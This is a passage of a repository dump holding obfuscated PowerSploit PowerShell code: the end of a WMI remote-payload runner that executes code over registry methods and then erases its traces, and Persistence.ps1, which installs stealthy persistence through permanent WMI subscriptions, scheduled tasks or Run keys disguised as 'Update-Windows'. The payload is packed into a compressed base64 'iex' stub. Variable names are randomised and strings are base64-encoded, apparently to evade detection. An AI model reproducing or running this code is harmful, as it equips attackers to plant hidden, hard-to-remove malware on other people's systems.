${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 274 | } 275 | Write-Verbose "[$Computer] Payload successfully executed from: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 276 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${a03b076451d54aaea1ec6e9ced35d761} 277 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 278 | throw "[$Computer] Unable retrieve the payload results from the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 279 | } 280 | Write-Verbose "[$Computer] Payload results successfully retrieved from: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 281 | ${d179441aac564156b181a4f2548622c0} = ${279cb454c2e443a9a14d056e1ff41a4d}.sValue 282 | ${6b4ded6aa38b4a4ab19f37298f8181f6} = [IO.Path]::GetTempFileName() 283 | Out-File -InputObject ${d179441aac564156b181a4f2548622c0} -FilePath ${6b4ded6aa38b4a4ab19f37298f8181f6} 284 | ${8b6291881c2640e9992b5bf7e1fd3a5c} = Import-Clixml -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 285 | rd -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 286 | ${b2918fca85814af08ebac572c21baa93} = New-Object PSObject -Property @{ 287 | PSComputerName = $Computer 288 | PayloadOutput = ${8b6291881c2640e9992b5bf7e1fd3a5c} 289 | } 290 | Write-Verbose "[$Computer] Removing the following registry value: 
${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 291 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${a03b076451d54aaea1ec6e9ced35d761} 292 | Write-Verbose "[$Computer] Removing the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 293 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUASwBlAHkA'))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81} 294 | return ${b2918fca85814af08ebac572c21baa93} 295 | } 296 | } 297 | } 298 | -------------------------------------------------------------------------------- /Persistence.ps1: -------------------------------------------------------------------------------- 1 | function New-ElevatedPersistenceOption 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Configure elevated persistence options for the Add-Persistence function. 7 | 8 | PowerSploit Function: New-ElevatedPersistenceOption 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. 
The output of this function is a required parameter of Add-Persistence. Available persistence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. 17 | 18 | .PARAMETER PermanentWMI 19 | 20 | Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. 21 | 22 | Detection Difficulty: Difficult 23 | Removal Difficulty: Difficult 24 | User Detectable? No 25 | 26 | .PARAMETER ScheduledTask 27 | 28 | Persist via a scheduled task. 29 | 30 | Detection Difficulty: Moderate 31 | Removal Difficulty: Moderate 32 | User Detectable? No 33 | 34 | .PARAMETER Registry 35 | 36 | Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. 37 | 38 | Detection Difficulty: Easy 39 | Removal Difficulty: Easy 40 | User Detectable? Yes 41 | 42 | .PARAMETER AtLogon 43 | 44 | Starts the payload upon any user logon. 45 | 46 | .PARAMETER AtStartup 47 | 48 | Starts the payload between 240 and 325 seconds after computer startup. 49 | 50 | .PARAMETER OnIdle 51 | 52 | Starts the payload after one minute of idling. 53 | 54 | .PARAMETER Daily 55 | 56 | Starts the payload daily. 57 | 58 | .PARAMETER Hourly 59 | 60 | Starts the payload hourly. 61 | 62 | .PARAMETER At 63 | 64 | Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. 
65 | 66 | .EXAMPLE 67 | 68 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' 69 | 70 | .EXAMPLE 71 | 72 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup 73 | 74 | .EXAMPLE 75 | 76 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle 77 | 78 | .LINK 79 | 80 | http://www.exploit-monday.com 81 | #> 82 | 83 | [CmdletBinding()] Param ( 84 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 85 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 86 | [Switch] 87 | ${aab497dd068647b8a6b3884c2e6601af}, 88 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 89 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 90 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 91 | [Switch] 92 | ${a0df28f799304c08843cb3989609cee7}, 93 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 94 | [Switch] 95 | ${bfc6f52cfedc4f2a9bfd185afe38c73c}, 96 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 97 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 98 | [Switch] 99 | ${bfba23cf4a3847a2ba47c59807b66d21}, 100 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 101 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 102 | [DateTime] 103 | ${c3e0a2af3f1c4ea18f97ff8170745963}, 104 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 105 | [Switch] 106 | ${cc7ad13128254d2b817259d011a81537}, 107 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 108 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 109 | [Switch] 110 | ${aac6e7631e3f4ca9a474a27d48d418dc}, 111 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 112 | [Switch] 113 | ${e90ad1f8c8a0427eae4ffbac9bdb0bcc} 114 | ) 
115 | ${b0b6c50e0cdf49d197d90b6c83c82c87} = @{ 116 | Method = '' 117 | Trigger = '' 118 | Time = '' 119 | } 120 | switch ($PSCmdlet.ParameterSetName) 121 | { 122 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkAQQB0AFMAdABhAHIAdAB1AHAA'))) 123 | { 124 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 125 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AFMAdABhAHIAdAB1AHAA'))) 126 | } 127 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkARABhAGkAbAB5AA=='))) 128 | { 129 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 130 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 131 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 132 | } 133 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 134 | { 135 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 136 | 
${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 137 | } 138 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA='))) 139 | { 140 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 141 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 142 | } 143 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA'))) 144 | { 145 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 146 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 147 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 148 | } 149 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 150 | { 151 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 152 | 
${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 153 | } 154 | } 155 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} = New-Object -TypeName PSObject -Property ${b0b6c50e0cdf49d197d90b6c83c82c87} 156 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4ARQBsAGUAdgBhAHQAZQBkAFAAZQByAHMAaQBzAHQAZQBuAGMAZQBPAHAAdABpAG8AbgA='))) 157 | echo ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} 158 | } 159 | function New-UserPersistenceOption 160 | { 161 | [CmdletBinding()] Param ( 162 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 163 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 164 | [Switch] 165 | ${a0df28f799304c08843cb3989609cee7}, 166 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 167 | [Switch] 168 | ${bfc6f52cfedc4f2a9bfd185afe38c73c}, 169 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 170 | [Switch] 171 | ${bfba23cf4a3847a2ba47c59807b66d21}, 172 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 173 | [DateTime] 174 | ${c3e0a2af3f1c4ea18f97ff8170745963}, 175 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 176 | [Switch] 177 | ${cc7ad13128254d2b817259d011a81537}, 178 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 179 | [Switch] 180 | ${aac6e7631e3f4ca9a474a27d48d418dc} 181 | ) 182 | ${b0b6c50e0cdf49d197d90b6c83c82c87} = @{ 183 | Method = '' 184 | Trigger = '' 185 | Time = '' 186 | } 187 | switch ($PSCmdlet.ParameterSetName) 188 | { 189 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 190 | { 191 | 
${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 192 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 193 | } 194 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA='))) 195 | { 196 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 197 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 198 | } 199 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA'))) 200 | { 201 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 202 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 203 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 204 | } 205 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 206 | { 207 | 
${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 208 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 209 | } 210 | } 211 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} = New-Object -TypeName PSObject -Property ${b0b6c50e0cdf49d197d90b6c83c82c87} 212 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4AVQBzAGUAcgBQAGUAcgBzAGkAcwB0AGUAbgBjAGUATwBwAHQAaQBvAG4A'))) 213 | echo ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} 214 | } 215 | function Add-Persistence 216 | { 217 | [CmdletBinding()] Param ( 218 | [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] 219 | [ValidateNotNullOrEmpty()] 220 | [ScriptBlock] 221 | ${e18e08602cf4478b9d3d5c8b2b498a6e}, 222 | [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )] 223 | [ValidateNotNullOrEmpty()] 224 | [Alias('Path')] 225 | [String] 226 | ${ab56d657cfc849ccbae01cd65d4f8c86}, 227 | [Parameter( Mandatory = $True )] 228 | ${cc4057f43ec0452aa83a64356d7ea926}, 229 | [Parameter( Mandatory = $True )] 230 | ${df8063b79a7a452ca1a2f7709c4fa2c5}, 231 | [ValidateNotNullOrEmpty()] 232 | [String] 233 | ${e1647abadf884b208ff363b3ef33e4b0} = 'Update-Windows', 234 | [String] 235 | ${ab2ac24b21dc4f71b4d86e7442187839} = "$PWD\Persistence.ps1", 236 | [String] 237 | ${ab4b6662c9a54dfab855d3a54a5f34c8} = "$PWD\RemovePersistence.ps1", 238 | [Switch] 239 | ${cf9bd0c2aaee4219940dc2dd6ab44219}, 240 | [Switch] 241 | ${a9f05a6260d64d84befdddce7da6437b} 242 | ) 243 | Set-StrictMode -Version 2 244 | if 
(${cc4057f43ec0452aa83a64356d7ea926}.PSObject.TypeNames[0] -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4ARQBsAGUAdgBhAHQAZQBkAFAAZQByAHMAaQBzAHQAZQBuAGMAZQBPAHAAdABpAG8AbgA=')))) 245 | { 246 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABwAHIAbwB2AGkAZABlAGQAIABpAG4AdgBhAGwAaQBkACAAZQBsAGUAdgBhAHQAZQBkACAAcABlAHIAcwBpAHMAdABlAG4AYwBlACAAbwBwAHQAaQBvAG4AcwAuAA=='))) 247 | } 248 | if (${df8063b79a7a452ca1a2f7709c4fa2c5}.PSObject.TypeNames[0] -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4AVQBzAGUAcgBQAGUAcgBzAGkAcwB0AGUAbgBjAGUATwBwAHQAaQBvAG4A')))) 249 | { 250 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABwAHIAbwB2AGkAZABlAGQAIABpAG4AdgBhAGwAaQBkACAAdQBzAGUAcgAtAGwAZQB2AGUAbAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMALgA='))) 251 | } 252 | ${8d8d49797b5b494095bad3098d94ec73} = gi ${ab2ac24b21dc4f71b4d86e7442187839} -ErrorAction SilentlyContinue 253 | if (${8d8d49797b5b494095bad3098d94ec73} -and ${8d8d49797b5b494095bad3098d94ec73}.PSIsContainer) 254 | { 255 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcAByAG8AdgBpAGQAZQAgAGEAIABmAGkAbABlACAAbgBhAG0AZQAgAHcAaQB0AGgAIAB0AGgAZQAgAFAAZQByAHMAaQBzAHQAZQBuAHQAUwBjAHIAaQBwAHQARgBpAGwAZQBQAGEAdABoACAAbwBwAHQAaQBvAG4ALgA='))) 256 | } 257 | ${8d8d49797b5b494095bad3098d94ec73} = gi ${ab4b6662c9a54dfab855d3a54a5f34c8} -ErrorAction SilentlyContinue 258 | if (${8d8d49797b5b494095bad3098d94ec73} -and ${8d8d49797b5b494095bad3098d94ec73}.PSIsContainer) 259 | { 260 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcAByAG8AdgBpAGQAZQAgAGEAIABmAGkAbABlACAAbgBhAG0AZQAgAHcAaQB0AGgAIAB0AGgAZQAgAFIAZQBtAG8AdgBhAGwAUwBjAHIAaQBwAHQARgBpAGwAZQBQAGEAdABoACAAbwBwAHQAaQBvAG4ALgA='))) 261 | 
} 262 | ${6ec44f27fafd4f4081df07a619d3b5d3} = Split-Path ${ab2ac24b21dc4f71b4d86e7442187839} -ErrorAction Stop 263 | ${bb4042aa26d249b7b6511c0eca5de384} = Split-Path ${ab2ac24b21dc4f71b4d86e7442187839} -Leaf -ErrorAction Stop 264 | ${966f141aaef74dcaab3ffcd81c15f7b8} = '' 265 | ${188aaa68b84a471c8bc115bfaea60abf} = '' 266 | if (${6ec44f27fafd4f4081df07a619d3b5d3} -eq '') 267 | { 268 | ${966f141aaef74dcaab3ffcd81c15f7b8} = "$($PWD)\$(${bb4042aa26d249b7b6511c0eca5de384})" 269 | } 270 | else 271 | { 272 | ${966f141aaef74dcaab3ffcd81c15f7b8} = "$(rvpa ${6ec44f27fafd4f4081df07a619d3b5d3})\$(${bb4042aa26d249b7b6511c0eca5de384})" 273 | } 274 | ${12780249b85b47f6b2814bf8cdd82fcb} = Split-Path ${ab4b6662c9a54dfab855d3a54a5f34c8} -ErrorAction Stop 275 | ${bb4042aa26d249b7b6511c0eca5de384} = Split-Path ${ab4b6662c9a54dfab855d3a54a5f34c8} -Leaf -ErrorAction Stop 276 | if (${12780249b85b47f6b2814bf8cdd82fcb} -eq '') 277 | { 278 | ${188aaa68b84a471c8bc115bfaea60abf} = "$($PWD)\$(${bb4042aa26d249b7b6511c0eca5de384})" 279 | } 280 | else 281 | { 282 | ${188aaa68b84a471c8bc115bfaea60abf} = "$(rvpa ${12780249b85b47f6b2814bf8cdd82fcb})\$(${bb4042aa26d249b7b6511c0eca5de384})" 283 | } 284 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBQAGEAdABoAA==')))]) 285 | { 286 | $null = ls ${ab56d657cfc849ccbae01cd65d4f8c86} -ErrorAction Stop 287 | ${675e1081ca814260a8f2a0866f0d3c90} = [IO.File]::ReadAllText((rvpa ${ab56d657cfc849ccbae01cd65d4f8c86})) 288 | } 289 | else 290 | { 291 | ${675e1081ca814260a8f2a0866f0d3c90} = ${e18e08602cf4478b9d3d5c8b2b498a6e} 292 | } 293 | ${1408f8a6bb3246c78c37b8cee7559600} = '' 294 | ${5551831a2227477db4a61598ddf7fbc8} = '' 295 | ${50dd3889beaf444088a6e13beb8c3d8e} = '' 296 | ${d8effee50a3b401592d3653210566b62} = "''" 297 | ${f17dc4af4f9142bfa43c36189ff132e3} = '' 298 | ${5551831a2227477db4a61598ddf7fbc8} = "''" 299 | ${50dd3889beaf444088a6e13beb8c3d8e} = '' 300 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = '' 301 | 
${e1f24fa15d1c4db89d15fca61ba29769} = ([Text.Encoding]::ASCII).GetBytes(${675e1081ca814260a8f2a0866f0d3c90}) 302 | ${ef4b24abe87943a88ef76082d3166e5e} = New-Object IO.MemoryStream 303 | ${a14b542eec4e4d87994b58ae8e913be3} = New-Object IO.Compression.DeflateStream (${ef4b24abe87943a88ef76082d3166e5e}, [IO.Compression.CompressionMode]::Compress) 304 | ${a14b542eec4e4d87994b58ae8e913be3}.Write(${e1f24fa15d1c4db89d15fca61ba29769}, 0, ${e1f24fa15d1c4db89d15fca61ba29769}.Length) 305 | ${a14b542eec4e4d87994b58ae8e913be3}.Dispose() 306 | ${fbba6939cd024a8fb2af35fa08b9c46b} = ${ef4b24abe87943a88ef76082d3166e5e}.ToArray() 307 | ${ef4b24abe87943a88ef76082d3166e5e}.Dispose() 308 | ${dcf69cf59efe4edd99f4a6fab7aeca8a} = [Convert]::ToBase64String(${fbba6939cd024a8fb2af35fa08b9c46b}) 309 | ${bdde8df95b13416abc69e7f89b90b98e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAA=='))) + "'${dcf69cf59efe4edd99f4a6fab7aeca8a}'" + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA='))) 310 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Method) 311 | { 312 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 313 | { 314 | ${f17dc4af4f9142bfa43c36189ff132e3} = { 315 | gwmi __eventFilter -namespace root\subscription -filter $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnAA==')))| Remove-WmiObject 316 | gwmi 
CommandLineEventConsumer -Namespace root\subscription -filter $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnAA=='))) | Remove-WmiObject 317 | gwmi __FilterToConsumerBinding -Namespace root\subscription | ? { $_.filter -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAcgA=')))} | Remove-WmiObject 318 | } 319 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Trigger) 320 | { 321 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AFMAdABhAHIAdAB1AHAA'))) 322 | { 323 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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'))) 324 | } 325 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 326 | { 327 | ${d8effee50a3b401592d3653210566b62} = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments 